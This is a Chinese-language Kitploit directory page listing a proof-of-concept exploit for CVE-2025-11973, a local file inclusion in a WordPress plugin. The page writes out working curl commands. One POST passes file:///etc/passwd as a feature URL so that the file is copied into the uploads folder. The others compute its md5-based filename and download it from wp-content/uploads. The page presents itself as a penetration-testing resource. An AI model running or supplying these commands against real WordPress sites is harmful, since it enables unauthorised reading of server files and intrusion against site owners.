Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-11973 — CVE-2025-11973的概念验证利用,演示了通过file://协议在WordPress中实现的本地文件包含(LFI),并自动将/etc/passwd文件渗出到上传目录。 | Kitploit
工具/GitHubGitHub/jfriedli/cve-2025-11973
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集
GitHubjfriedli/cve-2025-11973

CVE-2025-11973

CVE-2025-11973的概念验证利用,演示了通过file://协议在WordPress中实现的本地文件包含(LFI),并自动将/etc/passwd文件渗出到上传目录。

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

触发:通过 file:// 读取 /etc/passwd 并外泄到上传目录

root@kitploit:~
curl -sS -A "$UA" -X POST "$BASE/?__kds_flag=post" \
  --data-urlencode "kds_password=$SECRET" \
  --data-urlencode "post_title=sub1-lfi" \
  --data-urlencode "__kds_feature_url=file:///etc/passwd"

检索已外泄的文件

计算存储的文件名

root@kitploit:~
HASH=$(printf 'file:///etc/passwd' | md5sum | awk '{print $1}')

获取文件

root@kitploit:~
curl -sS -A "$UA" "$BASE/wp-content/uploads/$YMD/${HASH}.jpg" | head -n 25
下载工具